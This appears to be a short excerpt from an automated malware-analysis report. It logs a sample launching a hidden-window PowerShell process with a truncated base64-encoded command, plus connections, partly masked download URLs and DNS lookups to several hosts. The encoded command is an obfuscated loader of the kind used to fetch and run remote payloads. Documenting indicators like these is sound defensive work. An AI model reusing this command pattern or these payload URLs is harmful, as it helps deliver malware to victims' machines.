Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4AZQB3AC0AbwBiAGoARQBjAHQAIAAgAHMAeQBTAFQAZQBNAC4ASQBPAC4AQwBPAE0AUABSAGUAcwBTAEkAbwBOAC4ARABFAGYAbABBAHQAZQBzAFQAUgBlAEEAbQAoACAAWwBzAHkAUwBUAEUATQAuAGkAbwAuAG0AZQBtAE8AcgBZAFMAVAByAG...
- 'bu##.com':80
- 'sh#####a.ssvf.mbsrv.jp':80
- 'yo###bit.co.zw':80
- 'sh#####sultinginc.com':80
- 'sh#####sultinginc.com':443
- http://bu##.com/classifieds/session/V5Jdwh/
- http://sh#####a.ssvf.mbsrv.jp/cvORAaF/
- http://yo###bit.co.zw/H4s7R/
- http://sh#####sultinginc.com/a7aVx0/
- 'sh#####sultinginc.com':443
- DNS ASK bu##.com
- DNS ASK sh#####a.ssvf.mbsrv.jp
- DNS ASK yo###bit.co.zw
- DNS ASK ra###last.ro
- DNS ASK sh#####sultinginc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4AZQB3AC0AbwBiAGoARQBjAHQAIAAgAHMAeQBTAFQAZQBNAC4ASQBPAC4AQwBPAE0AUABSAGUAcwBTAEkAbwBOAC4ARABFAGYAbABBAHQAZQBzAFQAUgBlAEEAbQAoACAAWwBzAHkAUwBUAEUATQAuAGkAbwAuAG0AZQBtAE8AcgBZAFMAVAByAG...' (with hidden window)